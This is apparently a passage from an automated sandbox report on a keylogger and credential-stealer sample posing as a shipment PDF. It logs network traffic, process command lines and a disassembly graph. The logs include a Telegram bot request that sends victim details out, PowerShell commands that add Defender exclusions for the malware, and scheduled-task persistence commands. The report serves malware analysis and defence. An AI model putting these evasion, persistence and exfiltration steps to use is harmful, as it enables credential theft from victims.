                                                                                                                            2024-12-14 12:50:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            17192.168.2.649765172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:27 UTC884INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:27 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169396
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJ7x%2B0Z4YBwi8kYysNuiycGLtzIAaVF%2Fg2AQLWkOUupJ5uF4%2BWm2t%2FJOd98f9OMOpzc%2BkTnMQgtze1MLJbAK8YJldtBKwdsIGTvYrKad%2BIZVfx4HKcjp%2F0enzO7yBgGAyqOGNYF4"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51d79da80f93-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1696&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1613259&cwnd=168&unsent_bytes=0&cid=4439313aeaf07be8&ts=453&x=0"
                                                                                                                            2024-12-14 12:50:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            18192.168.2.649767172.67.177.1344437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                            2024-12-14 12:50:30 UTC875INHTTP/1.1 200 OK
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:30 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 362
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                            CF-Cache-Status: HIT
                                                                                                                            Age: 169399
                                                                                                                            Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D5SsfqNKpje9Kq0Bpj7Wl%2FECK%2B4H10dgLUQPubYy0yVPcDzbuA1QBg30G9tX7CFWgACgLPxRzraln7DemFSyAzorNIvx8Skb1zg5IoPKebm2Va2Sb9FhIXRsV3dIN1SuEwFKGT4X"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f1e51eafd446a57-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2616&min_rtt=1718&rtt_var=1286&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1699650&cwnd=231&unsent_bytes=0&cid=be564bb6e17989d7&ts=452&x=0"
                                                                                                                            2024-12-14 12:50:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            19192.168.2.649768149.154.167.2204437704C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-14 12:50:31 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                            Host: api.telegram.org
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-14 12:50:32 UTC344INHTTP/1.1 404 Not Found
                                                                                                                            Server: nginx/1.18.0
                                                                                                                            Date: Sat, 14 Dec 2024 12:50:32 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 55
                                                                                                                            Connection: close
                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                            2024-12-14 12:50:32 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:07:49:24
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                                                                                                                            Imagebase:0xec0000
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5 hash:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipment 990847575203.pdf.exe"
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:4
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:5
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FZcXKpA.exe"
                                                                                                                            Imagebase:0x480000
                                                                                                                            File size:433'152 bytes
                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:6
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:7
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp56D.tmp"
                                                                                                                            Imagebase:0xeb0000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:8
                                                                                                                            Start time:07:49:33
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:07:49:34
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0x4f0000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:07:49:36
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            Imagebase:0xdc0000
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5 hash:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                            • Detection: 66%, ReversingLabs
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:11
                                                                                                                            Start time:07:49:37
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                            Imagebase:0x7ff717f30000
                                                                                                                            File size:496'640 bytes
                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FZcXKpA" /XML "C:\Users\user\AppData\Local\Temp\tmp3382.tmp"
                                                                                                                            Imagebase:0xeb0000
                                                                                                                            File size:187'904 bytes
                                                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:15
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff66e660000
                                                                                                                            File size:862'208 bytes
                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:07:49:45
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0x2a0000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Has exited:true

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:07:49:46
                                                                                                                            Start date:14/12/2024
                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                            Imagebase:0xd40000
                                                                                                                            File size:262'432 bytes
                                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Has exited:false

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:11.3%
                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                              Signature Coverage:2.1%
                                                                                                                              Total number of Nodes:292
                                                                                                                              Total number of Limit Nodes:34
                                                                                                                              execution_graph 40298 7ca29a8 40299 7ca29ad 40298->40299 40300 7ca2a5e 40299->40300 40301 7ca2a73 40299->40301 40306 7ca11fc 40300->40306 40303 7ca11fc CreateIconFromResourceEx 40301->40303 40305 7ca2a82 40303->40305 40308 7ca1207 40306->40308 40307 7ca2a69 40308->40307 40312 7ca3468 40308->40312 40315 7ca3467 40308->40315 40318 7ca3457 40308->40318 40313 7ca3482 40312->40313 40322 7ca1254 40312->40322 40313->40307 40316 7ca3482 40315->40316 40317 7ca1254 CreateIconFromResourceEx 40315->40317 40316->40307 40317->40316 40319 7ca3464 40318->40319 40320 7ca1254 CreateIconFromResourceEx 40319->40320 40321 7ca3482 40320->40321 40321->40307 40323 7ca34b8 CreateIconFromResourceEx 40322->40323 40324 7ca3536 40323->40324 40324->40313 40345 7ca7438 40346 7ca7464 40345->40346 40351 7ca864f 40346->40351 40358 7ca8650 40346->40358 40365 7ca8640 40346->40365 40347 7ca750e 40352 7ca866b 40351->40352 40354 7ca87f4 40352->40354 40372 7ca892f 40352->40372 40388 7ca8930 40352->40388 40404 7ca8920 40352->40404 40353 7ca87ae 40353->40347 40354->40347 40360 7ca866b 40358->40360 40359 7ca87ae 40359->40347 40361 7ca87f4 40360->40361 40362 7ca892f DrawTextExW 40360->40362 40363 7ca8920 DrawTextExW 40360->40363 40364 7ca8930 DrawTextExW 40360->40364 40361->40347 40362->40359 40363->40359 40364->40359 40366 7ca864a 40365->40366 40368 7ca87f4 40366->40368 40369 7ca892f DrawTextExW 40366->40369 40370 7ca8920 DrawTextExW 40366->40370 40371 7ca8930 DrawTextExW 40366->40371 40367 7ca87ae 40367->40347 40368->40347 40369->40367 40370->40367 40371->40367 40375 7ca8935 40372->40375 40373 7ca901f 40373->40353 40374 7ca8d9f 40374->40353 40376 7ca8f44 40374->40376 40456 7ca9688 40374->40456 40460 7ca9620 40374->40460 40465 7ca966f 40374->40465 40375->40374 40382 7ca892f DrawTextExW 40375->40382 40385 7ca8920 DrawTextExW 40375->40385 40386 7ca8930 DrawTextExW 40375->40386 40421 7ca8fe0 40375->40421 40428 7ca8fd0 40375->40428 40435 7ca8f78 40375->40435 40442 7ca8f77 40375->40442 40449 7ca8fd8 40375->40449 40376->40353 40382->40375 40385->40375 40386->40375 40389 7ca8935 40388->40389 40390 7ca8d9f 40389->40390 40396 7ca8fd8 DrawTextExW 40389->40396 40397 7ca8f78 DrawTextExW 40389->40397 40398 7ca892f DrawTextExW 40389->40398 40399 7ca8fd0 DrawTextExW 40389->40399 40400 7ca8fe0 DrawTextExW 40389->40400 40401 7ca8920 DrawTextExW 40389->40401 40402 7ca8930 DrawTextExW 40389->40402 40403 7ca8f77 DrawTextExW 40389->40403 40390->40353 40392 7ca8f44 40390->40392 40393 7ca9688 DrawTextExW 40390->40393 40394 7ca966f DrawTextExW 40390->40394 40395 7ca9620 DrawTextExW 40390->40395 40391 7ca901f 40391->40353 40392->40353 40393->40391 40394->40391 40395->40391 40396->40389 40397->40389 40398->40389 40399->40389 40400->40389 40401->40389 40402->40389 40403->40389 40409 7ca8929 40404->40409 40405 7ca8914 40405->40353 40406 7ca8d9f 40406->40353 40408 7ca8f44 40406->40408 40410 7ca9688 DrawTextExW 40406->40410 40411 7ca966f DrawTextExW 40406->40411 40412 7ca9620 DrawTextExW 40406->40412 40407 7ca901f 40407->40353 40408->40353 40409->40405 40409->40406 40413 7ca8fd8 DrawTextExW 40409->40413 40414 7ca8f78 DrawTextExW 40409->40414 40415 7ca892f DrawTextExW 40409->40415 40416 7ca8fd0 DrawTextExW 40409->40416 40417 7ca8fe0 DrawTextExW 40409->40417 40418 7ca8920 DrawTextExW 40409->40418 40419 7ca8930 DrawTextExW 40409->40419 40420 7ca8f77 DrawTextExW 40409->40420 40410->40407 40411->40407 40412->40407 40413->40409 40414->40409 40415->40409 40416->40409 40417->40409 40418->40409 40419->40409 40420->40409 40422 7ca8fe4 40421->40422 40424 7ca9028 40422->40424 40425 7ca9688 DrawTextExW 40422->40425 40426 7ca966f DrawTextExW 40422->40426 40427 7ca9620 DrawTextExW 40422->40427 40423 7ca901f 40423->40375 40424->40375 40425->40423 40426->40423 40427->40423 40429 7ca8fdc 40428->40429 40431 7ca9028 40429->40431 40432 7ca9688 DrawTextExW 40429->40432 40433 7ca966f DrawTextExW 40429->40433 40434 7ca9620 DrawTextExW 40429->40434 40430 7ca901f 40430->40375 40431->40375 40432->40430 40433->40430 40434->40430 40436 7ca8f8a 40435->40436 40436->40375 40438 7ca8f8e 40436->40438 40439 7ca9688 DrawTextExW 40436->40439 40440 7ca966f DrawTextExW 40436->40440 40441 7ca9620 DrawTextExW 40436->40441 40437 7ca901f 40437->40375 40438->40375 40439->40437 40440->40437 40441->40437 40443 7ca8f8a 40442->40443 40443->40375 40445 7ca8f8e 40443->40445 40446 7ca9688 DrawTextExW 40443->40446 40447 7ca966f DrawTextExW 40443->40447 40448 7ca9620 DrawTextExW 40443->40448 40444 7ca901f 40444->40375 40445->40375 40446->40444 40447->40444 40448->40444 40450 7ca8fe0 40449->40450 40452 7ca9028 40450->40452 40453 7ca9688 DrawTextExW 40450->40453 40454 7ca966f DrawTextExW 40450->40454 40455 7ca9620 DrawTextExW 40450->40455 40451 7ca901f 40451->40375 40452->40375 40453->40451 40454->40451 40455->40451 40457 7ca9691 40456->40457 40470 7ca96c7 40457->40470 40458 7ca96b6 40458->40373 40462 7ca9619 40460->40462 40461 7ca95f9 40461->40373 40462->40461 40464 7ca96c7 DrawTextExW 40462->40464 40463 7ca96b6 40463->40373 40464->40463 40466 7ca9619 40465->40466 40466->40465 40467 7ca95f9 40466->40467 40469 7ca96c7 DrawTextExW 40466->40469 40467->40373 40468 7ca96b6 40468->40373 40469->40468 40471 7ca96fa 40470->40471 40472 7ca970b 40470->40472 40471->40458 40473 7ca9798 40472->40473 40476 7ca9d98 40472->40476 40481 7ca9d8f 40472->40481 40473->40458 40477 7ca9dc0 40476->40477 40478 7ca9ec4 40477->40478 40486 7caa378 40477->40486 40491 7caa368 40477->40491 40478->40471 40482 7ca9dc0 40481->40482 40483 7ca9ec4 40482->40483 40484 7caa368 DrawTextExW 40482->40484 40485 7caa378 DrawTextExW 40482->40485 40483->40471 40484->40483 40485->40483 40487 7caa38e 40486->40487 40496 7caa798 40487->40496 40500 7caa789 40487->40500 40488 7caa404 40488->40478 40492 7caa38e 40491->40492 40494 7caa798 DrawTextExW 40492->40494 40495 7caa789 DrawTextExW 40492->40495 40493 7caa404 40493->40478 40494->40493 40495->40493 40505 7caa7d8 40496->40505 40510 7caa7d7 40496->40510 40497 7caa7b6 40497->40488 40501 7caa798 40500->40501 40503 7caa7d8 DrawTextExW 40501->40503 40504 7caa7d7 DrawTextExW 40501->40504 40502 7caa7b6 40502->40488 40503->40502 40504->40502 40506 7caa809 40505->40506 40507 7caa836 40506->40507 40515 7caa848 40506->40515 40520 7caa858 40506->40520 40507->40497 40511 7caa809 40510->40511 40512 7caa836 40511->40512 40513 7caa848 DrawTextExW 40511->40513 40514 7caa858 DrawTextExW 40511->40514 40512->40497 40513->40512 